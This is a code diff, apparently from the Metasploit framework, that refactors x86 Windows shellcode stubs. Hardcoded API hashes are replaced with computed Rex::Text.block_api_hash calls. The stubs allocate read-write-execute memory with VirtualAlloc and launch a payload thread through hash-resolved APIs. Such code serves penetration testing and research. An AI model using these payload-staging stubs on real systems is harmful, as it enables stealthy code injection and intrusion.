@@ -1836,15 +1836,15 @@ def self.win32_rwx_exec(code)
18361836 ; Note: Execution is not expected to (successfully) continue past this block
18371837
18381838 exitfunk:
1839- mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
1840- push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
1839+ mov ebx, #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'ExitThread' ) }
1840+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'GetVersion' ) }
18411841 mov eax, ebp
18421842 call eax ; GetVersion(); (AL will = major version and AH will = minor version)
18431843 cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
18441844 jl goodbye ; Then just call the exit function...
18451845 cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
18461846 jne goodbye ;
1847- mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
1847+ mov ebx, #{ Rex :: Text . block_api_hash ( 'ntdll.dll' , 'RtlExitUserThread' ) }
18481848 goodbye: ; We now perform the actual call to the exit function
18491849 push byte 0 ; push the exit function parameter
18501850 push ebx ; push the hash of the exit function
@@ -1867,7 +1867,7 @@ def self.win32_rwx_exec(code)
18671867 push 0x1000 ; MEM_COMMIT
18681868 push esi ; Push the length value of the wrapped code block
18691869 push byte 0 ; NULL as we dont care where the allocation is.
1870- push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
1870+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'VirtualAlloc' ) }
18711871 call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
18721872
18731873 mov ebx, eax ; Store allocated address in ebx
@@ -1946,14 +1946,14 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
19461946 ; Note: Execution is not expected to (successfully) continue past this block
19471947
19481948 exitfunk:
1949- mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
1950- push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
1949+ mov ebx, #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'ExitThread' ) }
1950+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'GetVersion' ) }
19511951 call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
19521952 cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
19531953 jl goodbye ; Then just call the exit function...
19541954 cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
19551955 jne goodbye ;
1956- mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
1956+ mov ebx, #{ Rex :: Text . block_api_hash ( 'ntdll.dll' , 'RtlExitUserThread' ) }
19571957 goodbye: ; We now perform the actual call to the exit function
19581958 push byte 0 ; push the exit function parameter
19591959 push ebx ; push the hash of the exit function
@@ -1977,7 +1977,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
19771977 push 0x1000 ; MEM_COMMIT
19781978 push esi ; Push the length value of the wrapped code block
19791979 push byte 0 ; NULL as we dont care where the allocation is.
1980- push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
1980+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'VirtualAlloc' ) }
19811981 call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
19821982
19831983 mov ebx, eax ; Store allocated address in ebx
@@ -2002,7 +2002,7 @@ def self.win32_rwx_exec_thread(code, block_offset, which_offset='start')
20022002 push ebx ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
20032003 push eax ; SIZE_T dwStackSize (0 for default)
20042004 push eax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
2005- push 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
2005+ push #{ Rex :: Text . block_api_hash ( 'kernel32.dll' , 'CreateThread' ) }
20062006 call ebp ; Spawn payload thread
20072007
20082008 pop eax ; Skip
0 commit comments